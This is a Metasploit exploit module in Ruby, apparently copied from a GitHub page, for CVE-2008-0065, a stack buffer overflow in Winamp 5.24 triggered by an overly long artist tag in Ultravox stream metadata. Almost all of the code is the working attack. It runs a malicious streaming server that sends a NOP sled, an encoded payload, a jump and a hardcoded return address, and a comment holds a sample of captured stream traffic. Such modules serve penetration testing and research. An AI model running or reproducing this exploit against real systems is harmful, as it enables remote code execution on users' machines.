-
Notifications
You must be signed in to change notification settings - Fork 13.9k
/
winamp_ultravox.rb
149 lines (133 loc) · 3.69 KB
/
winamp_ultravox.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Winamp 5.24. By
sending an overly long artist tag, a remote attacker may
be able to execute arbitrary code. This vulnerability can be
exploited from the browser or the Winamp client itself.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2008-0065' ],
[ 'OSVDB', '41707' ],
[ 'BID', '27344' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
'StackAdjustment' => -3500,
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Winamp 5.24', { 'Ret' => 0x15010d3e } ],
],
'Privileged' => false,
'DisclosureDate' => '2008-01-18',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The HTTP daemon port to listen on.", 8080 ])
])
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
res = client.get_once
content = "\x00\x01\x00\x01\x00\x01" + "<metadata><song><artist>"
content << make_nops(3828 - payload.encoded.length) + payload.encoded
content << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
content << [0xe8, -850].pack('CV') + rand_text_alpha_upper(1183)
content << "</artist></song></metadata>"
sploit = "\x5a\x00\x39\x01" + [content.length].pack('n')
sploit << content + "\x00"
# randomize some stuff.
num = rand(65535).to_s
header = "HTTP/1.0 200 OK\r\n"
header << "Server: Ultravox 3.0\r\n"
header << "Content-Type: misc/ultravox\r\n"
header << "Ultravox-SID: #{num}\r\n"
header << "Ultravox-Avg-Bitrate: #{num}\r\n"
header << "Ultravox-Max-Bitrate: #{num}\r\n"
header << "Ultravox-Max-Msg: #{num}\r\n"
header << "Ultravox-Stream-Info: Ultravox;Live Stream\r\n"
header << "Ultravox-Msg-Que: #{num}\r\n"
header << "Ultravox-Max-Fragments: 1\r\n\r\n"
header << sploit
print_status("Sending #{header.length} bytes")
client.put(header)
handler(client)
service.close_client(client)
end
end
=begin
HTTP/1.0 200
.Server: Ultravo
x 3.0..Content-T
ype: misc/ultrav
ox..Ultravox-SID
: 22221..Ultravo
x-Avg-Bitrate: 6
4000..Ultravox-M
ax-Bitrate: 9600
0..Ultravox-Max-
Msg: 16000..Ultr
avox-Stream-Info
: Ultravox;Live
Stream..Ultravox
-Msg-Que: 39..Ul
travox-Max-Fragm
Z.9..,......<met
adata><length>0<
/length><soon>Mo
re on
</soon><song><na
me>The Night
ghts In
tin</name><album
>Days Of
Passed</album><a
rtist>The Moody
Blues</artist><a
lbum_art>xm/stat
ion_logo_WBCRHT.
jpg</album_art><
album_art_200>xm
/station_logo_WB
CRHT_200.jpg</al
bum_art_200><ser
ial>-1</serial><
song_id>-1</song
_id><amg_song_id
>-1</amg_song_id
><amg_artist_id>
-1</amg_artist_i
d><amg_album_id>
-1</amg_album_id
><itunes_song_id
>-1</itunes_song
_id><itunes_arti
st_id>-1</itunes
_artist_id><itun
es_album_id>-1</
itunes_album_id>
</song></metadat
a>.Z.......\./!.
!.UP.......B...&
Z....D)ydB.,.vy/
=end